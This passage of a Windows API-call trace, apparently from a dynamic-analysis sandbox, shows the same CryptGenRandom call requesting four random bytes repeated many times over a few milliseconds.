out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.847] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 